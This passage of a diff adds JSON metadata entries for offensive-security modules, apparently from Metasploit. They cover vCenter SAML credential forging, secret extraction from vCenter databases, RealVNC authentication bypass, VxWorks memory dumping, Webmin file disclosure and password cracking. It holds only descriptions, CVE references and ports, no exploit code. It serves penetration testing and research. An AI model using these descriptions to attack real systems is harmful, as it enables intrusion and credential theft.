UPnP IGD-capable device using the AddPortMapping and\n DeletePortMapping SOAP requests", + "references": [ + "URL-http://www.upnp-hacks.org/igd.html" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/admin/upnp/soap_portmapping.rb", + "is_install_path": true, + "ref_name": "admin/upnp/soap_portmapping", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "ADD", + "description": "Use the AddPortMapping SOAP command to open and forward a port" + }, + { + "name": "DELETE", + "description": "Use the DeletePortMapping SOAP command to remove a port forwarding" + } + ] + }, + "auxiliary_admin/vmware/poweroff_vm": { + "name": "VMWare Power Off Virtual Machine", + "fullname": "auxiliary/admin/vmware/poweroff_vm", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "theLightCosine " + ], + "description": "This module will log into the Web API of VMWare and try to power off\n a specified Virtual Machine.", + "references": [], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/admin/vmware/poweroff_vm.rb", + "is_install_path": true, + "ref_name": "admin/vmware/poweroff_vm", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/vmware/poweron_vm": { + "name": "VMWare Power On Virtual Machine", + "fullname": "auxiliary/admin/vmware/poweron_vm", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "theLightCosine " + ], + "description": "This module will log into the Web API of VMWare and try to power on\n a specified Virtual Machine.", + "references": [], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/admin/vmware/poweron_vm.rb", + "is_install_path": true, + "ref_name": "admin/vmware/poweron_vm", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/vmware/tag_vm": { + "name": "VMWare Tag Virtual Machine", + "fullname": "auxiliary/admin/vmware/tag_vm", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "theLightCosine " + ], + "description": "This module will log into the Web API of VMWare and\n 'tag' a specified Virtual Machine. It does this by\n logging a user event with user supplied text", + "references": [], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/admin/vmware/tag_vm.rb", + "is_install_path": true, + "ref_name": "admin/vmware/tag_vm", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/vmware/terminate_esx_sessions": { + "name": "VMWare Terminate ESX Login Sessions", + "fullname": "auxiliary/admin/vmware/terminate_esx_sessions", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "theLightCosine " + ], + "description": "This module will log into the Web API of VMWare and try to terminate\n user login sessions as specified by the session keys.", + "references": [], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb", + "is_install_path": true, + "ref_name": "admin/vmware/terminate_esx_sessions", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/vmware/vcenter_forge_saml_token": { + "name": "VMware vCenter Forge SAML Authentication Credentials", + "fullname": "auxiliary/admin/vmware/vcenter_forge_saml_token", + "aliases": [], + "rank": 300, + "disclosure_date": "2022-04-20", + "type": "auxiliary", + "author": [ + "npm " + ], + "description": "This module forges valid SAML credentials for vCenter server\n using the vCenter SSO IdP certificate, IdP private key, and\n VMCA certificates as input objects; you must also provide\n the vCenter SSO domain name and vCenter FQDN. The module will\n return a session cookie for the /ui path that grants access to\n the SSO domain as a vSphere administrator. The IdP trusted\n certificate chain can be retrieved using Metasploit post\n exploitation modules or extracted manually from\n /storage/db/vmware-vmdir/data.mdb using binwalk.", + "references": [ + "URL-https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/" + ], + "platform": "Linux", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-10-03 19:50:04 +0000", + "path": "/modules/auxiliary/admin/vmware/vcenter_forge_saml_token.rb", + "is_install_path": true, + "ref_name": "admin/vmware/vcenter_forge_saml_token", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Run", + "description": "Generate vSphere session cookie" + } + ] + }, + "auxiliary_admin/vmware/vcenter_offline_mdb_extract": { + "name": "VMware vCenter Extract Secrets from vmdir / vmafd DB File", + "fullname": "auxiliary/admin/vmware/vcenter_offline_mdb_extract", + "aliases": [], + "rank": 300, + "disclosure_date": "2022-05-10", + "type": "auxiliary", + "author": [ + "npm " + ], + "description": "Grab certificates from the vCenter server vmdird and vmafd\n database files and adds them to loot. The vmdird MDB database file\n can be found on the live appliance under the path\n /storage/db/vmware-vmdir/data.mdb, and the DB vmafd is under path\n /storage/db/vmware-vmafd/afd.db. The vmdir database contains the\n IdP signing credential, and vmafd contains the vCenter certificate\n store. This module will accept either file from a live vCenter\n appliance, or from a vCenter appliance backup archive; either or\n both files can be supplied.", + "references": [ + "URL-https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/" + ], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-05-26 11:52:56 +0000", + "path": "/modules/auxiliary/admin/vmware/vcenter_offline_mdb_extract.rb", + "is_install_path": true, + "ref_name": "admin/vmware/vcenter_offline_mdb_extract", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Dump", + "description": "Dump secrets from vCenter files" + } + ] + }, + "auxiliary_admin/vnc/realvnc_41_bypass": { + "name": "RealVNC NULL Authentication Mode Bypass", + "fullname": "auxiliary/admin/vnc/realvnc_41_bypass", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-05-15", + "type": "auxiliary", + "author": [ + "hdm ", + "theLightCosine " + ], + "description": "This module exploits an Authentication bypass Vulnerability\n in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy\n listener on LPORT and proxies to the target server\n\n The AUTOVNC option requires that vncviewer be installed on\n the attacking machine.", + "references": [ + "BID-17978", + "OSVDB-25479", + "URL-https://web.archive.org/web/20080102163013/http://secunia.com/advisories/20107/", + "CVE-2006-2369" + ], + "platform": "", + "arch": "", + "rport": 5900, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb", + "is_install_path": true, + "ref_name": "admin/vnc/realvnc_41_bypass", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/vxworks/apple_airport_extreme_password": { + "name": "Apple Airport Extreme Password Extraction (WDBRPC)", + "fullname": "auxiliary/admin/vxworks/apple_airport_extreme_password", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module can be used to read the stored password of a vulnerable\n Apple Airport Extreme access point. Only a small number of firmware versions\n have the WDBRPC service running, however the factory configuration was\n vulnerable. It appears that firmware versions 5.0.x as well as 5.1.x are\n susceptible to this issue. Once the password is obtained, the access point\n can be managed using the Apple AirPort utility.", + "references": [ + "OSVDB-66842", + "URL-http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/", + "US-CERT-VU-362332" + ], + "platform": "", + "arch": "", + "rport": 17185, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb", + "is_install_path": true, + "ref_name": "admin/vxworks/apple_airport_extreme_password", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/vxworks/dlink_i2eye_autoanswer": { + "name": "D-Link i2eye Video Conference AutoAnswer (WDBRPC)", + "fullname": "auxiliary/admin/vxworks/dlink_i2eye_autoanswer", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module can be used to enable auto-answer mode for the D-Link\n i2eye video conferencing system. Once this setting has been flipped,\n the device will accept incoming video calls without acknowledgement.\n The NetMeeting software included in Windows XP can be used to connect\n to this device. The i2eye product is no longer supported by the vendor\n and all models have reached their end of life (EOL).", + "references": [ + "OSVDB-66842", + "URL-http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/", + "US-CERT-VU-362332" + ], + "platform": "", + "arch": "", + "rport": 17185, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb", + "is_install_path": true, + "ref_name": "admin/vxworks/dlink_i2eye_autoanswer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/vxworks/wdbrpc_memory_dump": { + "name": "VxWorks WDB Agent Remote Memory Dump", + "fullname": "auxiliary/admin/vxworks/wdbrpc_memory_dump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module provides the ability to dump the system memory of a VxWorks target through WDBRPC", + "references": [ + "OSVDB-66842", + "URL-http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/", + "US-CERT-VU-362332" + ], + "platform": "", + "arch": "", + "rport": 17185, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb", + "is_install_path": true, + "ref_name": "admin/vxworks/wdbrpc_memory_dump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Download", + "description": "Dump system memory" + } + ] + }, + "auxiliary_admin/vxworks/wdbrpc_reboot": { + "name": "VxWorks WDB Agent Remote Reboot", + "fullname": "auxiliary/admin/vxworks/wdbrpc_reboot", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module provides the ability to reboot a VxWorks target through WDBRPC", + "references": [ + "OSVDB-66842", + "URL-http://web.archive.org/web/20230402082942/https://www.rapid7.com/blog/post/2010/08/02/new-vxworks-vulnerabilities/", + "US-CERT-VU-362332" + ], + "platform": "", + "arch": "", + "rport": 17185, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb", + "is_install_path": true, + "ref_name": "admin/vxworks/wdbrpc_reboot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Reboot", + "description": "Reboot target" + } + ] + }, + "auxiliary_admin/webmin/edit_html_fileaccess": { + "name": "Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access", + "fullname": "auxiliary/admin/webmin/edit_html_fileaccess", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-09-06", + "type": "auxiliary", + "author": [ + "Unknown", + "juan vazquez " + ], + "description": "This module exploits a directory traversal in Webmin 1.580. The vulnerability\n exists in the edit_html.cgi component and allows an authenticated user with access\n to the File Manager Module to access arbitrary files with root privileges. The\n module has been tested successfully with Webmin 1.580 over Ubuntu 10.04.", + "references": [ + "OSVDB-85247", + "BID-55446", + "CVE-2012-2983", + "URL-http://www.americaninfosec.com/research/dossiers/AISG-12-002.pdf", + "URL-https://github.com/webmin/webmin/commit/4cd7bad70e23e4e19be8ccf7b9f245445b2b3b80" + ], + "platform": "", + "arch": "", + "rport": 10000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb", + "is_install_path": true, + "ref_name": "admin/webmin/edit_html_fileaccess", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Download", + "description": "Download arbitrary file" + } + ] + }, + "auxiliary_admin/webmin/file_disclosure": { + "name": "Webmin File Disclosure", + "fullname": "auxiliary/admin/webmin/file_disclosure", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-06-30", + "type": "auxiliary", + "author": [ + "Matteo Cantoni " + ], + "description": "A vulnerability has been reported in Webmin and Usermin, which can be\n exploited by malicious people to disclose potentially sensitive information.\n The vulnerability is caused due to an unspecified error within the handling\n of an URL. This can be exploited to read the contents of any files on the\n server via a specially crafted URL, without requiring a valid login.\n The vulnerability has been reported in Webmin (versions prior to 1.290) and\n Usermin (versions prior to 1.220).", + "references": [ + "OSVDB-26772", + "BID-18744", + "CVE-2006-3392", + "US-CERT-VU-999601", + "URL-https://web.archive.org/web/20060722192501/http://secunia.com/advisories/20892/" + ], + "platform": "", + "arch": "", + "rport": 10000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/admin/webmin/file_disclosure.rb", + "is_install_path": true, + "ref_name": "admin/webmin/file_disclosure", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Download", + "description": "Download arbitrary file" + } + ] + }, + "auxiliary_admin/wemo/crockpot": { + "name": "Belkin Wemo-Enabled Crock-Pot Remote Control", + "fullname": "auxiliary/admin/wemo/crockpot", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "wvu " + ], + "description": "This module acts as a simple remote control for Belkin Wemo-enabled\n Crock-Pots by implementing a subset of the functionality provided by the\n Wemo App.\n\n No vulnerabilities are exploited by this Metasploit module in any way.", + "references": [ + "URL-http://web.archive.org/web/20180301171809/https://www.crock-pot.com/wemo-landing-page.html", + "URL-https://www.belkin.com/us/support-article?articleNum=101177", + "URL-http://www.wemo.com/" + ], + "platform": "", + "arch": "", + "rport": 49152, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/wemo/crockpot.rb", + "is_install_path": true, + "ref_name": "admin/wemo/crockpot", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "physical-effects" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Cook", + "description": "Cook stuff" + }, + { + "name": "Stop", + "description": "Stop cooking" + } + ] + }, + "auxiliary_admin/zend/java_bridge": { + "name": "Zend Server Java Bridge Design Flaw Remote Code Execution", + "fullname": "auxiliary/admin/zend/java_bridge", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-03-28", + "type": "auxiliary", + "author": [ + "ikki", + "MC " + ], + "description": "This module abuses a flaw in the Zend Java Bridge Component of\n the Zend Server Framework. By sending a specially crafted packet, an\n attacker may be able to execute arbitrary code.\n\n NOTE: This module has only been tested with the Win32 build of the software.", + "references": [ + "OSVDB-71420", + "ZDI-11-113", + "EDB-17078" + ], + "platform": "", + "arch": "", + "rport": 10001, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/admin/zend/java_bridge.rb", + "is_install_path": true, + "ref_name": "admin/zend/java_bridge", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_analyze/apply_pot": { + "name": "Apply Pot File To Hashes", + "fullname": "auxiliary/analyze/apply_pot", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "h00die" + ], + "description": "This module uses a John the Ripper or Hashcat .pot file to crack any password\n hashes in the creds database instantly. JtR's --show functionality is used to\n help combine all the passwords into an easy to use format.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-07 21:38:27 +0000", + "path": "/modules/auxiliary/analyze/apply_pot.rb", + "is_install_path": true, + "ref_name": "analyze/apply_pot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "john", + "description": "Use John the Ripper" + } + ] + }, + "auxiliary_analyze/crack_aix": { + "name": "Password Cracker: AIX", + "fullname": "auxiliary/analyze/crack_aix", + "aliases": [ + "auxiliary/analyze/jtr_aix" + ], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "theLightCosine ", + "hdm ", + "h00die" + ], + "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from passwd files on AIX systems. These utilize DES hashing.\n DES is format 1500 in Hashcat.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-07 21:38:27 +0000", + "path": "/modules/auxiliary/analyze/crack_aix.rb", + "is_install_path": true, + "ref_name": "analyze/crack_aix", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "hashcat", + "description": "Use Hashcat" + }, + { + "name": "john", + "description": "Use John the Ripper" + } + ] + }, + "auxiliary_analyze/crack_databases": { + "name": "Password Cracker: Databases", + "fullname": "auxiliary/analyze/crack_databases", + "aliases": [ + "auxiliary/analyze/jtr_mssql_fast", + "auxiliary/analyze/jtr_mysql_fast", + "auxiliary/analyze/jtr_oracle_fast", + "auxiliary/analyze/jtr_postgres_fast" + ], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "theLightCosine ", + "hdm ", + "h00die" + ], + "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from the mssql_hashdump, mysql_hashdump, postgres_hashdump, or oracle_hashdump modules.\n Passwords that have been successfully cracked are then saved as proper credentials.\n Due to the complexity of some of the hash types, they can be very slow. Setting the\n ITERATION_TIMEOUT is highly recommended.\n MSSQL is 131, 132, and 1731 in hashcat.\n MYSQL is 200, and 300 in hashcat.\n ORACLE is 112, and 12300 in hashcat.\n POSTGRES is 12 in hashcat.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-07 21:38:27 +0000", + "path": "/modules/auxiliary/analyze/crack_databases.rb", + "is_install_path": true, + "ref_name": "analyze/crack_databases", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "hashcat", + "description": "Use Hashcat" + }, + { + "name": "john", + "description": "Use John the Ripper" + } + ] + }, + "auxiliary_analyze/crack_linux": { + "name": "Password Cracker: Linux", + "fullname": "auxiliary/analyze/crack_linux", + "aliases": [ + "auxiliary/analyze/jtr_linux" + ], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "theLightCosine ", + "hdm ", + "h00die" + ], + "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from unshadowed passwd files from Unix/Linux systems. The module will only crack\n MD5, BSDi and DES implementations by default. However, it can also crack\n Blowfish and SHA(256/512), but it is much slower.\n MD5 is format 500 in hashcat.\n DES is format 1500 in hashcat.\n BSDI is format 12400 in hashcat.\n BLOWFISH is format 3200 in hashcat.\n SHA256 is format 7400 in hashcat.\n SHA512 is format 1800 in hashcat.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-07 21:38:27 +0000", + "path": "/modules/auxiliary/analyze/crack_linux.rb", + "is_install_path": true, + "ref_name": "analyze/crack_linux", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "hashcat", + "description": "Use Hashcat" + }, + { + "name": "john", + "description": "Use John the Ripper" + } + ] + }, + "auxiliary_analyze/crack_mobile": { + "name": "Password Cracker: Mobile", + "fullname": "auxiliary/analyze/crack_mobile", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "h00die" + ], + "description": "This module uses Hashcat to identify weak passwords that have been\n acquired from Android systems. These utilize MD5 or SHA1 hashing.\n Android (Samsung) SHA1 is format 5800 in Hashcat. Android\n (non-Samsung) SHA1 is format 110 in Hashcat. Android MD5 is format 10.\n JTR does not support Android hashes at the time of writing.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-07 21:38:27 +0000", + "path": "/modules/auxiliary/analyze/crack_mobile.rb", + "is_install_path": true, + "ref_name": "analyze/crack_mobile", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "hashcat", + "description": "Use Hashcat" + } + ] + }, + "auxiliary_analyze/crack_osx": { + "name": "Password Cracker: OSX", + "fullname": "auxiliary/analyze/crack_osx", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "h00die" + ], + "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from OSX systems. The module will only crack xsha from OSX 10.4-10.6, xsha512\n from 10.7, and PBKDF2 from OSX 10.8+.\n XSHA is 122 in hashcat.\n XSHA512 is 1722 in hashcat.\n PBKDF2 (PBKDF2-HMAC-SHA512) is 7100 in hashcat.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-07 21:38:27 +0000", + "path": "/modules/auxiliary/analyze/crack_osx.rb", + "is_install_path": true, + "ref_name": "analyze/crack_osx", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "hashcat", + "description": "Use Hashcat" + }, + { + "name": "john", + "description": "Use John the Ripper" + } + ] + }, + "auxiliary_analyze/crack_webapps": { + "name": "Password Cracker: Webapps", + "fullname": "auxiliary/analyze/crack_webapps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "h00die" + ], + "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from various web applications.\n Atlassian uses PBKDF2-HMAC-SHA1 which is 12001 in hashcat.\n PHPass uses phpass which is 400 in hashcat.\n Mediawiki is MD5 based and is 3711 in hashcat.\n Apache Superset, some Flask and Werkzeug apps is pbkdf2-sha256 and is 10900 in hashcat", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-07 21:38:27 +0000", + "path": "/modules/auxiliary/analyze/crack_webapps.rb", + "is_install_path": true, + "ref_name": "analyze/crack_webapps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "hashcat", + "description": "Use Hashcat" + }, + { + "name": "john", + "description": "Use John the Ripper" + } + ] + }, + "auxiliary_analyze/crack_windows": { + "name": "Password Cracker: Windows", + "fullname": "auxiliary/analyze/crack_windows", + "aliases": [ + "auxiliary/analyze/jtr_windows_fast" + ], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "theLightCosine ", + "hdm ", + "h00die" + ], + "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n acquired from Windows systems.\n LANMAN is format 3000 in hashcat.\n NTLM is format 1000 in hashcat.\n MSCASH is format 1100 in hashcat.\n MSCASH2 is format 2100 in hashcat.\n NetNTLM is format 5500 in hashcat.\n NetNTLMv2 is format 5600 in hashcat.", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-07 21:38:27 +0000", + "path": "/modules/auxiliary/analyze/crack_windows.rb", + "is_install_path": true, + "ref_name": "analyze/crack_windows", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "hashcat", + "description": "Use Hashcat" + }, + { + "name": "john", + "description": "Use John the Ripper" + } + ] + }, + "auxiliary_analyze/modbus_zip": { + "name": "Extract zip from Modbus communication", + "fullname": "auxiliary/analyze/modbus_zip", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "José Diogo Monteiro ", + "Luis Rosa " + ], + "description": "This module is able to extract a zip file sent through Modbus from a pcap.\n Tested with Schneider TM221CE16R.", + "references": [], + "platform": "", + "arch": "", + "rport": 502, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-07 21:38:27 +0000", + "path": "/modules/auxiliary/analyze/modbus_zip.rb", + "is_install_path": true, + "ref_name": "analyze/modbus_zip", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_bnat/bnat_router": { + "name": "BNAT Router", + "fullname": "auxiliary/bnat/bnat_router", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "bannedit ", + "Jonathan Claudius" + ], + "description": "This module will properly route BNAT traffic and allow for connections to be\n established to machines on ports which might not otherwise be accessible.", + "references": [ + "URL-https://github.com/claudijd/bnat", + "URL-http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-04 12:09:08 +0000", + "path": "/modules/auxiliary/bnat/bnat_router.rb", + "is_install_path": true, + "ref_name": "bnat/bnat_router", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_bnat/bnat_scan": { + "name": "BNAT Scanner", + "fullname": "auxiliary/bnat/bnat_scan", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "bannedit ", + "Jonathan Claudius " + ], + "description": "This module is a scanner which can detect Broken NAT (network address translation)\n implementations, which could result in an inability to reach ports on remote\n machines. Typically, these ports will appear in nmap scans as 'filtered'/'closed'.", + "references": [ + "URL-https://github.com/claudijd/bnat", + "URL-http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2025-05-04 12:09:08 +0000", + "path": "/modules/auxiliary/bnat/bnat_scan.rb", + "is_install_path": true, + 